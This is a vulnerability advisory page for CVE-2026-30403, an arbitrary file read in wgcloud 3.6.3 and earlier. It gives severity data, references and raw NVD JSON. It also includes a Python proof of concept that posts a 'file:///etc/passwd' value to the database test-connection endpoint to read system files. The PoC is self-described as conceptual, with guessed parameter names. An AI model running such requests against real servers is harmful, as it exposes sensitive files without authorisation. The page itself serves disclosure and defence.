Security Vulnerability Report
CVE-2026-30403 CVSS 7.5 HIGH


Published: 2026-03-19 17:16:24
Last Modified: 2026-04-02 12:19:47

Description

An arbitrary file read vulnerability exists in the test connection function of the backend database management feature in wgcloud v3.6.3 and earlier. It can be used to read any file on the victim's server.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:wgstart:wgcloud:*:*:*:*:*:*:*:* - VULNERABLE
WGCLOUD <= 3.6.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target URL (Conceptual example based on vulnerability description)
target_url = "http://target-ip:9999/api/main/database/testConnect"

# Payload attempting to read a sensitive file
# Note: The actual parameter names may vary based on the specific version and implementation
payload = {
    "dbType": "mysql",
    "url": "file:///etc/passwd",  # Attempting to use file protocol or path traversal
    "host": "localhost",
    "port": "3306",
    "name": "root",
    "user": "root",
    "pwd": "password"
}

try:
    # Send POST request to the vulnerable endpoint
    response = requests.post(target_url, data=payload, timeout=10)

    if response.status_code == 200:
        # Check if the response contains expected file content
        if "root:" in response.text:
            print("[+] Exploit successful! Arbitrary file read detected.")
            print("[+] Response content:")
            print(response.text)
        else:
            print("[-] Request sent but exploitation pattern not confirmed.")
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

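References

https://github.com/TTTlw1024/qwe/issues/2 (Exploit, Issue Tracking)
https://github.com/tianshiyeben/wgcloud/issues/97 (Issue Tracking)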

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-30403", "sourceIdentifier": "[email protected]", "published": "2026-03-19T17:16:23.950", "lastModified": "2026-04-02T12:19:47.237", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "There is an arbitrary file read vulnerability in the test connection function of backend database management in wgcloud v3.6.3 and before, which can be used to read any file on the victim's server."}, {"lang": "es", "value": "Hay una vulnerabilidad de lectura arbitraria de archivos en la función de prueba de conexión de la gestión de bases de datos de backend en wgcloud v3.6.3 y versiones anteriores, que puede ser utilizada para leer cualquier archivo en el servidor de la víctima."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-22"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:wgstart:wgcloud:*:*:*:*:*:*:*:*", "versionEndIncluding": "3.6.3", "matchCriteriaId": "CE012BD6-0C9B-4F63-957E-78C9565F977C"}]}]}], "references": [{"url": "https://github.com/TTTlw1024/qwe/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://github.com/tianshiyeben/wgcloud/issues/97", "source": "[email protected]", "tags": ["Issue Tracking"]}]}}